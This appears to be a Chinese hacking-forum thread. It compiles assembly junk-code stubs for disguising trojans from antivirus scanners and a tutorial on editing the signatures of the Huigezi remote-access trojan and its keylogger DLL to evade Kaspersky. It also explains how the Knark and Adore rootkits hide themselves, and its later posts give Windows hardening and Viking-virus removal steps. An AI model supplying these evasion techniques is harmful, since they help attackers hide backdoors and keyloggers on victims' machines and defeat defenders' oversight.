原入口地址************************************************************************16.伪装防杀精灵终极防杀代码:push ebpmov ebp,espadd esp,-0Cadd esp,0Cpush eaxjmp 原入口地址************************************************************************17.伪装木马彩衣(金色鱼锦衣)花代码push ebpmov ebp,espadd esp,-0Cadd esp,0Cmov eax,原入口地址push eaxretn************************************************************************18.在mov ebp,eax后面加上PUSH EAXPOP EAX************************************************************************19.伪装UPX花指令代码:pushadmov esi,m.lea edi,dword ptr ds:[esi+FFFB4000]push edior ebp,FFFFFFFFjmp short m.00477F2A************************************************************************20.push ebpmov ebp,espinc ecxpush edxpop edxdec ecxpop ebpinc ecxjmp 原入口21、push ebpnopnopmov ebp,espinc ecxnoppush edxnopnoppop edxnoppop ebpinc ecxloop A1地址nopnopA1:push ebpmov ebp,espjo 原入口jno 原入口************************************************************************【深层】伪装 WCRT Library (Visual C++) DLL Method 1 -& Jibz黑吧代码 + 汇编代码:使用黑吧粘贴以下代码:55 8B EC 83 7D 0C 01 75 41 A1 C0 30 00 10 85 C0 74 0A FF D0 85 C0 75 04 6A FE EB 17 68 0C 30 00 10 68 08 30 00 10 E8 89 00 00 00 85 C0 59 59 74 08 6A FD FF 15 08 20 00 10 68 04 30 00 10 68 00 30 00 10 E8 52 00 00 00 59 59粘贴完毕后,再添加2行汇编语句:jmp 原入口地址 '执行到程序的原有OEPretn 0C************************************************************************发布几个不常见的花指令B1 01 mov cl,12C 90 sub al,9095 xchg eax,ebp4D dec ebp65:42 inc edx40 inc eax20C4 and ah,alE adc dword ptr ds:[eax+6],6E226A E4 and ch,byte ptr ds:[edx-1C]E8 B15FBC5B call 入口点55 push ebp8BEC mov ebp,esp51 push ecx53 push ebx8BD8 mov ebx,eax8BC3 mov eax,ebx04 9F add al,9F2C 1A sub al,1A73 03 jnb 入口点JMP SHORT test.00414FB5 (EB 01)NOPJMP SHORT test.00414FB8 (EB 01)NOPJMP SHORT test.00414FBB (EB 01)NOPJMP test. (EB 01)90=c4PUSH EBPMOVE EBP,ESPinc ecxpush eaxpop eaxpush edxpop edxdec ecxsub eax,-2ADD ESP,68DEC eaxDEC eaxSUB ESP,68JPE 入口JPO 入口
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
5.伪装防杀精灵一号防杀代码:push ebpmov ebp,esppush -1push 666666push 888888mov eax,dword ptr fs:[0]nopmov dword ptr fs:[0],espnopmov dword ptr fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxjmp 原入口地址************************************************************************6.伪装防杀精灵二号防杀代码:push ebpmov ebp,esppush -1push 0push 0mov eax,dword ptr fs:[0]push eaxmov dword ptr fs:[0],espsub esp,68push ebxpush esipush edipop eaxpop eaxpop eaxadd esp,68pop eaxmov dword ptr fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxjmp 原入口地址************************************************************************7.伪装木马彩衣(无限复活袍)代码:PUSH EBPMOV EBP,ESPPUSH -1push 415448 -\___PUSH 4021A8 -/ 在这段代码中类似这样的操作数可以乱填MOV EAX,DWORD PTR FS:[0]PUSH EAXMOV DWORD PTR FS:[0],ESPADD ESP,-6CPUSH EBXPUSH ESIPUSH EDIADD BYTE PTR DS:[EAX],AL /这条指令可以不要!jo 原入口地址jno 原入口地址call 下一地址************************************************************************8.伪装木马彩衣(虾米披风)代码:push ebpnopnopmov ebp,espinc ecxnoppush edxnopnoppop edxnoppop ebpinc ecxloop somewhere /跳转到下面那段代码地址去!someshere:nop /"胡乱"跳转的开始...jmp 下一个jmp的地址 /在附近随意跳jmp ... /...jmp 原入口的地址 /跳到原始oep************************************************************************9.伪装花花添加器(神话)代码:-----------根据C++改nopnopnopmov ebp,esppush -1push 111111push 222222mov eax,dword ptr fs:[0]push eaxmov dword ptr fs:[0],esppop eaxmov dword ptr fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxmov eax,原入口地址push eaxretn************************************************************************10.伪装花花添加器(无极)代码:nopmov ebp, esppush -1push 0A2C2Apush 0D9038mov eax, fs:[0]push eaxmov fs:[0], esppop eaxmov fs:[0], eaxpop eaxpop eaxpop eaxpop eaxmov ebp, eaxmov eax, 原入口地址jmp eax************************************************************************11.伪装花花添加器(金刚)代码:--------根据VC++5.0改nopnopmov ebp, esppush -1push 415448push 4021A8mov eax, fs:[0]push eaxmov fs:[0], espadd esp, -6Cpush ebxpush esipush ediadd [eax], almov eax,原入口地址jmp eax************************************************************************12.伪装花花添加器(杀破浪)代码:nopmov ebp, esppush -1push 0push 0mov eax, fs:[0]push eaxmov fs:[0], espsub esp, 68push ebxpush esipush edipop eaxpop eaxpop eaxadd esp, 68pop eaxmov fs:[0], eaxpop eaxpop eaxpop eaxpop eaxmov ebp, eaxmov eax, 原入口地址jmp eax
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
1.伪装vc++5.0代码:PUSH EBPMOV EBP,ESPPUSH -1push 111111 -\___PUSH 111111 -/ 在这段代码中类似这样的操作数可以乱填MOV EAX,DWORD PTR FS:[0]PUSH EAXMOV DWORD PTR FS:[0],ESPADD ESP,-6CPUSH EBXPUSH ESIPUSH EDInopjmp 原入口地址************************************************************************2.胡乱跳转代码:push ebpmov ebp,espinc ecxpush edxADD ESP,-6Cnoppop edxdec ecxpop ebpADD ESP,6Cinc ecxloop somewhere /跳转到上面那段代码地址去!somewhere:nop /"胡乱"跳转的开始...jmp 下一个jmp的地址 /在附近随意跳jmp ... /...jmp 原入口地址 /跳到原始oep************************************************************************3.伪装c++代码:push eaxmov ebp,esppush -1push 111111push 111111mov eax,fs:[0]push eaxmov fs:[0],esppop eaxmov fs:[0],eaxpop eaxpop eaxpop eaxpop eaxmov ebp,eaxnopnopjmp 原入口地址************************************************************************4.伪装Microsoft Visual C++ 6.0代码:PUSH -1PUSH 0PUSH 0MOV EAX,DWORD PTR FS:[0]PUSH EAXMOV DWORD PTR FS:[0],ESPSUB ESP,1PUSH EBXPUSH ESIPUSH EDIPOP EAXPOP EAXnopPOP EAXnopADD ESP,1POP EAXMOV DWORD PTR FS:[0],EAXPOP EAXPOP EAXnopPOP EAXnopPOP EAXMOV EBP,EAXJMP 原入口地址
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
次给大家做一个过各种杀毒软件的免杀教程。这次教程主要以灰鸽子VIP2006服务端为例!现在网上很多免杀教程,我也看过很多,但是免杀效果都不是很好,用不几天就被杀了,所以真正免杀的鸽子,还是修改杀毒软件的特征码。这样免杀效果才更好,能达到长期免杀。今天这节课主要给大家讲过卡巴内存免杀和外表免杀,达到总体免杀,只要你学会了这种方法,以后自己做属于自己的DIY免杀鸽子就可以啦!好了废话不多说了,大家就好好看我操作吧!这是我已经生成好的VIP2006服务端,下面我们开始把服务端的需要做免杀的DLL导出来!这就是鸽子VIP2006服务端程序.exe→MAINDLL.dll→GETKEY.dll 大家看到了吧,2006少了一个hook.dll文件。以前VIP2005里有HOOK。DLL文件,现在2006里没有拉!这样做免杀就方便了一些!我们先把卡巴病毒库升级到最新的,然后在用卡巴查一下我们需要做免杀的这3个文件。看到了吧,都被列为黑名单了。介绍一下卡巴的威力吧,卡巴我个人感觉是现在杀毒软件最牛的啦。呵呵不做广告啦,我们先做GETKEY。DLL也就是键盘记录钩子。下面看我操作吧,先来一次大定位,第一次先定位5秒1000字节吧,只要是被报毒的,我们就选择。然后进行第2次定位,5秒32字节,看好我的操作哦,别忘了删掉上次定位的。好保存结果,然后再来一次详细的8字节定位,这样能提高免杀效率。OK定位搞顶啦,然后我们去用C32工具来修改特征码可以用大小写修改法,也可以用跳转法,具体用什么,我们先去看看吧。看到了吧,有字母,那我们就用UE来该大小写字母吧,我们来杀下毒吧,文件不报毒了,看看内存呢,用OLB载入内存。被杀了,说明定位的还是不够准,那咱在来一次详细准确的4字节定位,呵呵,看来还有个来,继续。OK最后一次详细定位结果出来啦,我们去保存一下。我们来分析一下结果吧,第一个大小60吧,下面的都一样吧,那我们就来选择第一个,去修改特征码,用跳转法,看我操作吧,用C32工具,找到0000B1CA大概就是这里拉,大家如果不懂16进制的话,可以找UE看哦,继续,,,我们把这段NOP掉,然后去下面找到程序空隙,也就是0000区吧,0000B1CB: 68 E4BE4000 PUSH 40BEE4: E8 A7FBFFFF CALL 0000AD7C--------------------------------------------------新入口点 JMP
也就是返回上面的意思吧 呵呵 不好意思这里因该JMP OK保存一下,我们来查下毒吧,文件不报警拉,我们内存查杀,因该找到我们刚刚保存的那个DLL,OK内存已经免杀了,我们现在看看导回服务端能不能上线。把备份的删掉就可以了啦,现在我们传到空间上去,然后用虚拟即运行,我们改成keymiansha.exe传到空间吧,打开虚拟主机,上传完毕啦,等一下哦,虚拟机启动慢你可以快进一下观看。打开鸽子VIP2006等待上线,刚刚上线的这些不是哦,我专门的分组拉,等一等哦,先喝杯咖啡吧,呵呵。----------------------------------------------------------好拉,我们进去下载刚刚上传的KEY免杀服务端吧。因为上次做实验吧,还忘了卸载看好拉,我把他卸掉。OK,哈哈上线拉,我们看看功能吧。功能都可以,好啦,我们卸掉它吧。这节课KEYDLL免杀到次结束.
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
和传统的Rootkit不同,Unix的bin/login并未被修改,但所有执行/bin/login 的请求(当登陆系统时将产生)都被重定向到攻击者制作的隐藏文件/bin/backdoorlogin,这样当系统管理员使用检测传统级别的Rootkit的方法(比如用tripwire之类的软件检测文件的完整性)就行不通了,因为/bin/login并没有被改变。同样的道理,攻击者对其他的系统程序也进行重定,这样你的操作实际就是按照入侵者的意愿执行了。也就是说,表面上你在运行程序A,你也认为自己运行的是程序A,而实际上你运行的是入侵者设定的程序B!更恐怖的是,内核级Rootkit不仅仅只会进行执行重定向,许多内核级Rootkit还支持文件隐蔽。传统的Rootkit是通过替换ls程序来实现文件的隐藏,而内核级的Rootkit则是通过对内核的修改来对ls程序欺骗,更加的阴险隐蔽。另外内核级的Rootkit还能对进程和网络进行隐藏,用户将得不到真实的系统情况报告。实现思路:根据系统的类型,攻击者有不同的方法来对内核进行修改,在N种Unix系统上修改内核最简单的方法就是利用系统本身的加载的内核模块(LKM)的功能,因此大多数的内核级Rootkit通过利用LKM动态地将内核更新来提供新功能,新添加的模块扩展了内核,同时对内核和其他使用内核的所有东西有了完全访问权。因此,许多内核级Rootkit都通过LKM来实现。安装通过LKM实现的内核级Rootkit十分简单。例如,在Linux上安装Knark内核级Rootkit只需具有根权限的入侵者输入命令: insmod knark.o 就行了,模块被安装后就等着我们输入命令了。更妙的是整个过程不需要重启。通过LKM 实现的Rootkit在Unix上十分流行。我们也常常会通过给Windows平台打LKM补丁的方法攻击Windows。内核级Rootkit 的几个例子现在有大量的内核级Rootkit可用,现在我就选几种比较强大的来跟大家讨论一下。一、 linux 上的内核级Rootkit:KnarkKnark具有各种标准的内核级Rootkit功能,包括执行重定向,文件隐藏,进程隐藏和网络隐藏。另外,还有不少比较过瘾的功能,如:1、远程执行:我们可以通过网络向运行Knark的机器发送一条命令,源地址是假造的,命令被发往UDP端口53,使之表面上看起来像是DNS流量。我们就可以利用这个功能来升级Knark,删除系统文件或其他任何我们想做的事。2、任务攻击:当某一进程在系统上运行时,它总是具有与UID和有效的UID(EUID)相关的权限。另外进程还具有与文件系统UID(FSUID)相关的文件及目录访问权。Knark的任务攻击能力可实时地将进程UID,EUID和FSUID改变。进程在不停止运动的情况下突然具有了新的权限。3、隐藏混杂模式:同一般的RootKit一样,入侵者也会在受害者机器上运行嗅探器。我们可以用文件隐藏和进程隐藏将嗅探器隐藏起来。然而,以太网卡会被设成混杂模式,管理员可以检查到这一点Knark将内核进行了修改,使之隐瞒网卡的混合模式,这将使嗅探变得更加隐秘。4、实时进程隐藏:Knark可以将一个正在运行的进程隐藏起来。通过发送信号31给一个进程,此进程将消失,但仍在运行。命令kill-31 process_id将阻止内核汇报任何有关此进程的信息。进程在运行时,ps和lsof命令的使用都不能显示此进程。5、内核模块隐藏:Linux中的lsmod命令可以列出当前在机器上安装的LKM。我们自然不想让管理员看到Knark模块,因此Knark包含了一个单独的模块modhide,modhide将Knark和自己隐藏了起来。这样,当我们用Knark攻击一个系统时,我们首先为Knark.o做一个insmod,然后为modhide.o做一个insmod。这样不管谁运行lsmod命令,这些模块都不会被发现。二、 另一个Linux上的内核级Rootkit:Adore同Knark一样,Adore也是一个针对Linux的LKM RootKit。 他包含了标准的内核级Rootkit功能,如文件隐藏,进程隐藏,网络隐藏和内核模块隐藏。我们只所以讨论Adore,是因为他还有一个非常强大的功能:内置的根权限后门。Adore的根权限后门可以让我们连接到系统上并获得根权限的命令外壳,此功能十分直接了当 ,Adore将此功能巧妙的包含在内核模块中了。这一招十分难破,因为管理员看不到任何文件、进程、侦听网络端口的迹象。防御办法:防御内核级的Rootkit的根本办法是不要让攻击者得到你的机器的系统的根本权限(Unix里的root和Windows里的admin),不过这看起来像废话,目前对内核级的Rootkit还没有绝对的防御体系。现在也存在一些Rootkit自动检测工具,但都不是很可靠。同时内核级的Rootkit也在不断的发展中,对一些系统来说防御它最好的办法是使用不支持LKM的内核,Linux的内核就可以设成不支持LKM的单一内核。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
在我们获得了对目标的控制权后,还想保持这种控制权限,于是就出现了木马后门,Rootkit之类的保护权限的手段。首先来说一下我们常见的应用层次的木马后门,比如我们常见的远程控制类的软件,像国外的Sub7、VNC、netbus,国内的冰河、灰鸽子、黑洞等等,这些大家都很熟悉因此就不详细介绍了。然而此类后门的可以很容易被发现,现在的杀毒软件大多都能轻松的查处,即使暂时查不到,用其他手段检测也不是很困难,现在就我就给大家介绍一种比一般木马后门潜伏的更深的一类木马后门--Rootkit。传统的Rootkit是一种比普通木马后门更为阴险的木马后门。它主要通过替换系统文件来达到目的。这样就会更加的隐蔽,使检测变得比较困难。传统的Rootkit对一系列平台均有效,但主要是针对Unix的,比如Linux,AIX,SunOs等操作系统。当然有些Rootkits可以通过替换DLL文件或更改系统来攻击Windows平台。Rootkit并不能让你直接获得权限,相反它是在你通过各种方法获得权限后才能使用的一种保护权限的措施,在我们获取系统根权限(根权限即root权限,是Unix系统的最高权限)以后,Rootkits提供了一套工具用来建立后门和隐藏行迹,从而让攻击者保住权限。下面就针对Unix来讲解一下传统Rootkit的攻击原理。RootKits是如何实现后门的呢?为了理解Rootkits后门,有必要先了解一下Unix的基本工作流程,当我们访问Unix时(不管是本地还是远程登陆),/bin/login程序都会运行,系统将通过/bin/login来收集并核对用户的帐号和密码。Rootkits使用一个带有根权限后门密码的/bin/login来替换系统的/bin/login,这样攻击者输入根权限后门的密码,就能进入系统。就算管理员更改了原来的系统密码或者把密码清空。我们仍能够使用后门密码以根用户身份登陆。在攻入Unix系统后,入侵者通常会进行一系列的攻击动作,如安装嗅探器收集重要数据,而Unix中也会有些系统文件会监视这些动作,比如ifconfig等,Rootkit当然不会束手就擒,它会同样替换一下这些系统文件,通常被Rootkit替换的系统程序有login,ifconfig,du,find,ls,netstart,ps等。由于篇幅问题,这些系统文件的功能就不一一罗列,有兴趣的读者可以自己去查找,现在Rootkit的工具很多,里面基本都是包含一些处理过的系统文件来代替原来的系统文件的,像tOmkit等一些Rootkit就是比较优秀的了。防御办法:Rootkit如此可怕,得好好防它才行,实际上,防御他的最有效的方法时定期的对重要系统文件的完整性进行核查,这类的工具很多,像Tripwire就是一个非常不错的文件完整性检查工具。一但发现遭受到Rootkit攻击,那你就比较麻烦了,你必须完全重装所有的系统文件部件和程序,以确保安全性。写到这里,战争似乎结束了,然而更可怕的Rootkit还没登场,那就是更加恐怖( 这个词一点也不夸张)的内核级Rootkit。在大多数操作系统中(各种Uni x和Windows),内核是操作系统最基本的部件,它控制着对网络设备、进程、系统内存、磁盘等的访问。例如当你打开一个文件时,打开文件的请求被发送到内核,内核负责从磁盘得到文件的比特位并运行你的文件浏览程序。内核级Rootkit使攻击者获得对系统底层的完全控制权。攻击者可以修改你的内核,大多数内核级Rootkit都能进行执行重定向,即截获运行某一程序的命令,将其重定向到入侵者所选中的程序并运行此程序。也就是说用户或管理员要运行程序A,被修改过的内核假装执行A,实际却执行了程序B。现在就介绍一下内核级的Rootkit是如何攻击Unix系统的。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
四、隐藏IP地址黑客经常利用一些网络探测技术来查看我们的主机信息,主要目的就是得到网络中主机的IP地址。IP地址在网络安全上是一个很重要的概念,如果攻击者知道了你的IP地址,等于为他的攻击准备好了目标,他可以向这个IP发动各种进攻,如DoS(拒绝服务)攻击、Floop溢出攻击等。隐藏IP地址的主要方法是使用代理服务器。与直接连接到Internet相比,使用代理服务器能保护上网用户的IP地址,从而保障上网安全。代理服务器的原理是在客户机(用户上网的计算机)和远程服务器(如用户想访问远端WWW服务器)之间架设一个“中转站”,当客户机向远程服务器提出服务要求后,代理服务器首先截取用户的请求,然后代理服务器将服务请求转交远程服务器,从而实现客户机和远程服务器之间的联系。很显然,使用代理服务器后,其它用户只能探测到代理服务器的IP地址而不是用户的IP地址,这就实现了隐藏用户IP地址的目的,保障了用户上网安全。提供免费代理服务器的网站有很多,你也可以自己用代理猎手等工具来查找。五、关闭不必要的端口黑客在入侵时常常会扫描你的计算机端口,如果安装了端口监视程序(比如Netwatch),该监视程序则会有警告提示。如果遇到这种入侵,可用工具软件关闭用不到的端口,比如,用“Norton Internet Security”关闭用来提供网页服务的80和443端口,其他一些不常用的端口也可关闭。六、更换管理员帐户Administrator帐户拥有最高的系统权限,一旦该帐户被人利用,后果不堪设想。黑客入侵的常用手段之一就是试图获得Administrator帐户的密码,所以我们要重新配置Administrator帐号。首先是为Administrator帐户设置一个强大复杂的密码,然后我们重命名Administrator帐户,再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来,入侵者就很难搞清哪个帐户真正拥有管理员权限,也就在一定程度上减少了危险性。七、杜绝Guest帐户的入侵Guest帐户即所谓的来宾帐户,它可以访问计算机,但受到限制。不幸的是,Guest也为黑客入侵打开了方便之门!网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法,所以要杜绝基于Guest帐户的系统入侵。禁用或彻底删除Guest帐户是最好的办法,但在某些必须使用到Guest帐户的情况下,就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码,然后详细设置Guest帐户对物理路径的访问权限。举例来说,如果你要防止Guest用户可以访问tool文件夹,可以右击该文件夹,在弹出菜单中选择“安全”标签,从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限,比方说只能“列出文件夹目录”和“读取”等,这样就安全多了。八、安装必要的安全软件我们还应在电脑中安装并使用必要的防黑软件,杀毒软件和防火墙都是必备的。在上网时打开它们,这样即便有黑客进攻我们的安全也是有保证的。九、防范木马程序木马程序会窃取所植入电脑中的有用信息,因此我们也要防止被黑客植入木马程序,常用的办法有:● 在下载文件时先放到自己新建的文件夹里,再用杀毒软件来检测,起到提前预防的作用。● 在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目,如果有,删除即可。● 将注册表里 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以“Run”为前缀的可疑程序全部删除即可。十、不要回陌生人的邮件有些黑客可能会冒充某些正规网站的名义,然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码,如果按下“确定”,你的帐号和密码就进了黑客的邮箱。所以不要随便回陌生人的邮件,即使他说得再动听再诱人也不上当。做好IE的安全设置ActiveX控件和 Applets有较强的功能,但也存在被人利用的隐患,网页中的恶意代码往往就是利用这些控件编写的小程序,只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择,具体设置步骤是:“工具”→“Internet选项”→“安全”→“自定义级别”,建议您将ActiveX控件与相关选项禁用。谨慎些总没有错!另外,在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过,微软在这里隐藏了“我的电脑”的安全性设定,通过修改注册表把该选项打开,可以使我们在对待ActiveX控件和 Applets时有更多的选择,并对本地电脑安全产生更大的影响。下面是具体的方法:打开“开始”菜单中的“运行”,在弹出的“运行”对话框中输入Regedit.exe,打开注册表编辑器,点击前面的“+”号顺次展开到:HKEY_CURRE-NT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Zones\0,在右边窗口中找到DWORD值“Flags”,默认键值为十六进制的21(十进制33),双击“Flags”,在弹出的对话框中将它的键值改为“1”即可,关闭注册表编辑器。无需重新启动电脑,重新打开IE,再次点击“工具→Internet选项→安全”标签,你就会看到多了一个“我的电脑”图标,在这里你可以设定它的安全等级。将它的安全等级设定高些,这样的防范更严密。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
二、拒绝恶意代码恶意网页成了宽带的最大威胁之一。以前使用Modem,因为打开网页的速度慢,在完全打开前关闭恶意网页还有避免中招的可能性。现在宽带的速度这么快,所以很容易就被恶意网页攻击。一般恶意网页都是因为加入了用编写的恶意代码才有破坏力的。这些恶意代码就相当于一些小程序,只要打开该网页就会被运行。所以要避免恶意网页的攻击只要禁止这些恶意代码的运行就可以了。运行IE浏览器,点击“工具/Internet选项/安全/自定义级别”,将安全级别定义为“安全级-高”,对“ActiveX控件和插件”中第2、3项设置为“禁用”,其它项设置为“提示”,之后点击“确定”。这样设置后,当你使用IE浏览网页时,就能有效避免恶意网页中恶意代码的攻击。三、封死黑客的“后门”俗话说“无风不起浪”,既然黑客能进入,那说明系统一定存在为他们打开的“后门”,只要堵死这个后门,让黑客无处下手,便无后顾之忧!1.删掉不必要的协议对于服务器和主机来说,一般只安装TCP/IP协议就够了。鼠标右击“网络邻居”,选择“属性”,再鼠标右击“本地连接”,选择“属性”,卸载不必要的协议。其中NETBIOS是很多安全缺陷的根源,对于不需要提供文件和打印共享的主机,还可以将绑定在TCP/IP协议的NETBIOS关闭,避免针对NETBIOS的攻击。选择“TCP/IP协议/属性/高级”,进入“高级TCP/IP设置”对话框,选择“WINS”标签,勾选“禁用TCP/IP上的NETBIOS”一项,关闭NETBIOS。2.关闭“文件和打印共享”文件和打印共享应该是一个非常有用的功能,但在不需要它的时候,也是黑客入侵的很好的安全漏洞。所以在没有必要“文件和打印共享”的情况下,我们可以将它关闭。用鼠标右击“网络邻居”,选择“属性”,然后单击“文件和打印共享”按钮,将弹出的“文件和打印共享”对话框中的两个复选框中的钩去掉即可。虽然“文件和打印共享”关闭了,但是还不能确保安全,还要修改注册表,禁止它人更改“文件和打印共享”。打开注册表编辑器,选择“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NetWork”主键,在该主键下新建DWORD类型的键值,键值名为“NoFileSharingControl”,键值设为“1”表示禁止这项功能,从而达到禁止更改“文件和打印共享”的目的;键值为“0”表示允许这项功能。这样在“网络邻居”的“属性”对话框中“文件和打印共享”就不复存在了。3.把Guest账号禁用有很多入侵都是通过这个账号进一步获得管理员密码或者权限的。如果不想把自己的计算机给别人当玩具,那还是禁止的好。打开控制面板,双击“用户和密码”,单击“高级”选项卡,再单击“高级”按钮,弹出本地用户和组窗口。在Guest账号上面点击右键,选择属性,在“常规”页中选中“账户已停用”。另外,将Administrator账号改名可以防止黑客知道自己的管理员账号,这会在很大程度上保证计算机安全。4.禁止建立空连接在默认的情况下,任何用户都可以通过空连接连上服务器,枚举账号并猜测密码。因此,我们必须禁止建立空连接。方法有以下两种:方法一是修改注册表:打开注册表“HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA”,将DWORD值“RestrictAnonymous”的键值改为“1”即可。最后建议大家给自己的系统打上补丁,微软那些没完没了的补丁还是很有用的!
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
目前,使用ADSL的用户越来越多,由于ADSL用户在线时间长、速度快,因此成为黑客们的攻击目标。现在网上出现了各种越来越详细的“IP地址库”,要知道一些ADSL用户的IP是非常容易的事情。要怎么保卫自己的网络安全呢?不妨看看以下方法。一、取消文件夹隐藏共享如果你使用了Windows 2000/XP系统,右键单击C盘或者其他盘,选择"共享",你会惊奇地发现它已经被设置为“共享该文件夹”,而在“网上邻居”中却看不到这些内容,这是怎么回事呢?原来,在默认状态下,Windows 2000/XP会开启所有分区的隐藏共享,从“控制面板/管理工具/计算机管理”窗口下选择“系统工具/共享文件夹/共享”,就可以看到硬盘上的每个分区名后面都加了一个“$”。但是只要键入“\\计算机名或者IP\C$”,系统就会询问用户名和密码,遗憾的是,大多数个人用户系统Administrator的密码都为空,入侵者可以轻易看到C盘的内容,这就给网络安全带来了极大的隐患。怎么来消除默认共享呢?方法很简单,打开注册表编辑器,进入“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Sevices\Lanmanworkstation\parameters”,新建一个名为“AutoShareWKs”的双字节值,并将其值设为“0”,然后重新启动电脑,这样共享就取消了。
顶一下(<span
id="Wonderful)
占位标签-勿删!!
工&&分:5586排&&名:0劳动点:4132排&&名:0发帖数:1174
军号:1058295
金币:72 枚
本区职务:会员
左箭头-小图标
如果你的系统有以上状况,那么请follow they step:首先你断开internet网,删除杀毒软件。因为它已被病毒感染,它在内存里只是添麻烦而已重新安装杀毒软件,比较可以的有卡巴斯基、mcafee、江民,推荐用卡巴,安完马上重启。不要停留不然新的杀软会又中标的。安全模式下因为不能启用msiexec所以很多软件安不了冷启动或关机,拨电源也可,待光电鼠标灯不亮了再开机(呵呵太夸张了)进入带网络连接的安全模式,(如果不能上网就还是进正常模式),用文件夹选项里面打开显示所有文件;取消隐藏系统文件复选框,选中显示已知文件扩展名;下载viking专杀工具,这里推荐江民的。下载"瑞星卡卡助手"用于以后修复注册表,如果为exe文件最好改下后缀名。以后运行时再改回来。升级杀毒软件为最新版。升了马上重启进入纯安全模式,只运行系统盘扫描。扫到的病毒名及路径用笔记下来。冷启动。。光盘或U盘启动dos,查找刚才记下来那些文件,有就删。我用的是windowsPE启动盘启动。所以免去了dos命令带来的麻烦,最主要要找到并删除上文说到的那些文件,这里很关键,一定要仔细找。进入安全模式,运行regedit.exe (记住一定要输入.exe,因为如果没删干净,exe文件会被再度被作为winfile文件类型中的病毒命令行打开。)按ctrl+f查找以上述文件的文件名的键值删除。进入正常模式,这时可能因为杀毒引起不能上网了,用刚才下载的“瑞星卡卡助手”修复IE和注册表吧。顺便也扫一下刚才可能viking下载有的其它木马及残留(切记不要启动宽带拨号程序,因为Enternet500这类拨号程序己被感染,如果是xp下的默认拨号,也最好不要去动)接下来进程应该干净了,就要处理被感染的exe文件了,如果你不想要这些文件可以选择直接用专查工具把它们杀烂,或查找直接删除,还省了下边的步骤。因为以下步骤最安全但容易累死人仿制logon_1.exe rundl132.exe richdll.dll新建文本文档.txt,建三个,分别改为以上三个文件名。并且设为只读。放在平时它们感染的目录下。目录位置上文己提及。目的用于免疫,防止染毒exe文件释放出同名病毒文件。也可使用gpedit.msc,组策略中用户配置\管理模板\系统\不要运行windows程序中,启用并添加logon_1.exerundl132.exe也可使用mcafee杀毒软件中的文件规则,禁止在硬盘中新建*.exe *.com 文件后两种限制方法我没试过,但理论上说是成立的接下来按顺序分别查找每个盘上的exe文件。按大小排列结果,降序排列。旁边打开个任务管理器窗口,记下任务条目及数量。如进程数:22双击空白图标exe文件,注意任务管理器变化。例:如果双击game.exe则, 已染毒现象:任务管理器会多出一个进程叫game.exe 这时你再双击。或反复再双击。会看到又会多出game.exe,如果是基于16位兼容模式的程序,会出现一个ntvdm的进程,不影响,可结束。稍后你可能会发现net 和 net1 进程一闪而过,持续不到1秒,而后出现一个或多个cmd进程。这时请结束所有game.exe,cmd进程也会结束。病毒从内存中得到释放。可以再次双击如果不再产生cmd进程或能恢复正常图标,或能正常运行,证明该文件不再带毒。第二种情况:game.exe一会自动消失或每双击一次多出一个game.exe而没其它进程。说明此文件未被感染一个一个分区,一个一个文件的测试。修复。当然,你要是烦了,可以将不重要的文件放一边。专心找自己心爱的exe文件。反正剩下的不重要的exe文件就留给江民专杀来杀烂得了。。无所谓辛苦工作完成后,也不必要重启,打开江民专杀来清理漏网之鱼吧。查毒软推荐使用Mcafee(卖咖啡),查毒功能较强,且最强最具特色最实用之处在于他可以像设置IP安全策略那样设置禁止任何类型文件的建立,写入,修改,甚至读取!!,这在我们访问不可信站点或发现有木马苗头的时候大有帮助。即使查不出来我也不准你建文件改文件!强吧??缺点就是占用内存资源太高,优化版的我都发现有七个进程。。晕。。。鱼和熊掌不可兼得啊。。写了这么多,我尽量想到的都想到了。我曾如此辛苦,故不希望大家都绕弯路。但愿对大家有所帮助。最后发表我的一点看法,杀毒软件只是一个辅助工具。每个厂商的杀软都有优点有缺点。很多人就是把杀软看成无敌的了。认为中了毒,清一色杀毒扫描的做法。其实,很多时候甚至是心理安慰,障眼法。。我是从dos时代一路走来的,中过多种病毒。看到老师们用pctools及debug手动杀过不少毒,总